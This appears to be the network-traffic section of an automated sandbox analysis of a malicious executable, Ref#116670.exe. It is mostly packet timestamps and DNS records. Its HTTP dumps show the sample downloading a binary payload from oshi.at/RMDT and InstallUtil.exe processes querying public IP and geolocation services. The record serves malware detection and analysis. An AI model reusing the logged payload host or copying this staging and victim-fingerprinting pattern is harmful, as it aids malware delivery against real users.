                                                                                                                                Dec 3, 2024 15:20:20.939882994 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.940020084 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.941745996 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.941816092 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.943928003 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.943989038 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:20.944042921 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:20.944092035 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:21.156033993 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:21.156265020 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:21.157262087 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:21.157356024 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:21.159471035 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:21.159534931 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:21.160428047 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:21.160478115 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:21.295805931 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:21.295888901 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:21.297497988 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:21.297557116 CET49713443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:21.297569036 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:21.297609091 CET44349713194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.802464008 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.806478977 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.806541920 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.809758902 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.809817076 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.814389944 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.814450026 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.816549063 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.816606045 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.820799112 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.820859909 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.825213909 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.825273991 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.919503927 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.919612885 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.921519995 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.921701908 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.923211098 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.923271894 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.926371098 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.926434994 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.929260969 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.929337978 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.930840969 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.930910110 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.933760881 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.933820009 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.936598063 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.936655045 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.939161062 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.939261913 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.940767050 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.940834999 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.949302912 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.949368954 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.950962067 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.951021910 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.953572989 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.953634024 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.955028057 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.955090046 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.957937956 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.958003044 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.960694075 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.960757971 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.963458061 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.963527918 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.965888977 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.965953112 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.967753887 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.967817068 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.969656944 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.969717979 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.971216917 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.971271992 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.973788977 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.973846912 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.976495028 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.976553917 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.977952957 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.978003979 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.980515003 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.980570078 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.983222008 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.983283043 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.984807968 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.984873056 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.987401962 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.987468004 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.994693995 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.994749069 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.994788885 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.994802952 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.994818926 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.996227026 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.996285915 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.996294022 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.996331930 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:45.997361898 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:45.997416019 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.130887985 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.131041050 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.133039951 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.133119106 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.135521889 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.135596991 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.136710882 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.136780024 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.139174938 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.139262915 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.142469883 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.142537117 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.143960953 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.144030094 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.144931078 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.144989014 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.145548105 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.145605087 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.147391081 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.147452116 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.160613060 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.160701990 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.162442923 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.162508965 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.163992882 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.164056063 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.166054964 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.166243076 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.168401003 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.168481112 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.169636965 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.169702053 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.171432972 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.171495914 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.173535109 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.173614979 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.174923897 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.175003052 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.177062035 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.177138090 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.179070950 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.179132938 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.180596113 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.180656910 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.182642937 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.182706118 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.184617043 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.184689999 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.185255051 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.186872959 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.186933041 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.186945915 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.186985016 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.188201904 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.188256979 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.190361023 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.190453053 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.192991018 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.193061113 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.194118023 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.194174051 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.196360111 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.809632063 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.809696913 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.811661959 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.811728954 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.813913107 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.813975096 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.815129042 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.815181971 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.817174911 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.817229033 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.819529057 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.819600105 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.820564032 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.820619106 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.821799040 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.821857929 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.824055910 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.824143887 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.826153994 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.826222897 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.827749968 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.827825069 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.828984976 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.829035044 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.829042912 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.829056025 CET44349738194.15.112.248192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:46.829098940 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:46.832222939 CET49738443192.168.2.5194.15.112.248
                                                                                                                                Dec 3, 2024 15:20:58.062992096 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:20:58.183089018 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:58.183175087 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:20:58.183485985 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:20:58.303911924 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:59.593034983 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:20:59.596626043 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:20:59.717971087 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:00.048166037 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:00.049962997 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:00.050019026 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:00.050107956 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:00.053678036 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:00.053687096 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:00.094888926 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:21:01.266284943 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.266417980 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.268065929 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.268074036 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.268357038 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.313615084 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.321063042 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.363337994 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.728430986 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.728507042 CET44349780172.67.177.134192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:01.728586912 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:01.772917032 CET49780443192.168.2.5172.67.177.134
                                                                                                                                Dec 3, 2024 15:21:40.597083092 CET8049716132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:21:40.597162008 CET4971680192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:22:05.047667980 CET8049774132.226.247.73192.168.2.5
                                                                                                                                Dec 3, 2024 15:22:05.047827959 CET4977480192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:22:15.610801935 CET4971680192.168.2.5132.226.247.73
                                                                                                                                Dec 3, 2024 15:22:15.731159925 CET8049716132.226.247.73192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 15:20:12.355086088 CET | 55886 | 53 | 192.168.2.5 | 1.1.1.1
Dec 3, 2024 15:20:12.493947029 CET | 53 | 55886 | 1.1.1.1 | 192.168.2.5
Dec 3, 2024 15:20:33.305583954 CET | 49923 | 53 | 192.168.2.5 | 1.1.1.1
Dec 3, 2024 15:20:33.443089962 CET | 53 | 49923 | 1.1.1.1 | 192.168.2.5
Dec 3, 2024 15:20:35.598103046 CET | 60061 | 53 | 192.168.2.5 | 1.1.1.1
Dec 3, 2024 15:20:35.736640930 CET | 53 | 60061 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 15:20:12.355086088 CET | 192.168.2.5 | 1.1.1.1 | 0x5c60 | Standard query (0) | oshi.at | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:33.305583954 CET | 192.168.2.5 | 1.1.1.1 | 0xbe39 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:35.598103046 CET | 192.168.2.5 | 1.1.1.1 | 0xac62 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 15:20:12.493947029 CET | 1.1.1.1 | 192.168.2.5 | 0x5c60 | No error (0) | oshi.at |  | 194.15.112.248 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:12.493947029 CET | 1.1.1.1 | 192.168.2.5 | 0x5c60 | No error (0) | oshi.at |  | 5.253.86.15 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:33.443089962 CET | 1.1.1.1 | 192.168.2.5 | 0xbe39 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 15:20:33.443089962 CET | 1.1.1.1 | 192.168.2.5 | 0xbe39 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:33.443089962 CET | 1.1.1.1 | 192.168.2.5 | 0xbe39 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:33.443089962 CET | 1.1.1.1 | 192.168.2.5 | 0xbe39 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:33.443089962 CET | 1.1.1.1 | 192.168.2.5 | 0xbe39 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:33.443089962 CET | 1.1.1.1 | 192.168.2.5 | 0xbe39 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:35.736640930 CET | 1.1.1.1 | 192.168.2.5 | 0xac62 | No error (0) | reallyfreegeoip.org |  | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:20:35.736640930 CET | 1.1.1.1 | 192.168.2.5 | 0xac62 | No error (0) | reallyfreegeoip.org |  | 104.21.67.152 | A (IP address) | IN (0x0001) | false

                                                                                                                                • oshi.at
                                                                                                                                • reallyfreegeoip.org
                                                                                                                                • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49716 | 132.226.247.73 | 80 | 6780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 15:20:33.569812059 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 3, 2024 15:20:34.877834082 CET | 321 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 14:20:34 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4a77274968f715a9c22a6eb08c80dfb3
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 3, 2024 15:20:35.169812918 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 3, 2024 15:20:35.596517086 CET | 321 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 14:20:35 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: f9e7113a1d6996db4cb8aa77f981df51
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49774 | 132.226.247.73 | 80 | 4956 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 15:20:58.183485985 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Dec 3, 2024 15:20:59.593034983 CET | 321 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 14:20:59 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 464808c5700cfd7cbd5eb5838e83e80b
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Dec 3, 2024 15:20:59.596626043 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Dec 3, 2024 15:21:00.048166037 CET | 321 | IN | HTTP/1.1 200 OK
Date: Tue, 03 Dec 2024 14:20:59 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 9edf4eee96eeeee8a2bc13b4160e35ec
                                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.549713194.15.112.2484436648C:\Users\user\Desktop\Ref#116670.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-03 14:20:14 UTC61OUTGET /RMDT HTTP/1.1
                                                                                                                                Host: oshi.at
                                                                                                                                Connection: Keep-Alive
2024-12-03 14:20:15 UTC | 316 | IN | HTTP/1.1 200 OK
                                                                                                                                Server: nginx
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:15 GMT
                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                Content-Length: 943112
                                                                                                                                Connection: close
                                                                                                                                ETag: "5704373799c6b7660579aea83dd8e3e8"
                                                                                                                                Content-Disposition: attachment; filename=HAeP.dat
                                                                                                                                Last-Modified: Mon, 02 Dec 2024 21:48:59 GMT
                                                                                                                                Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49722 | 172.67.177.134 | 443 | 6780 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-03 14:20:37 UTC | 85 | OUT | GET /xml/8.46.123.228 HTTP/1.1
                                                                                                                                Host: reallyfreegeoip.org
                                                                                                                                Connection: Keep-Alive
2024-12-03 14:20:37 UTC | 882 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 03 Dec 2024 14:20:37 GMT
                                                                                                                                Content-Type: text/xml
                                                                                                                                Content-Length: 362
                                                                                                                                Connection: close
                                                                                                                                Cache-Control: max-age=31536000
                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                Age: 113060
                                                                                                                                Last-Modified: Mon, 02 Dec 2024 06:56:17 GMT
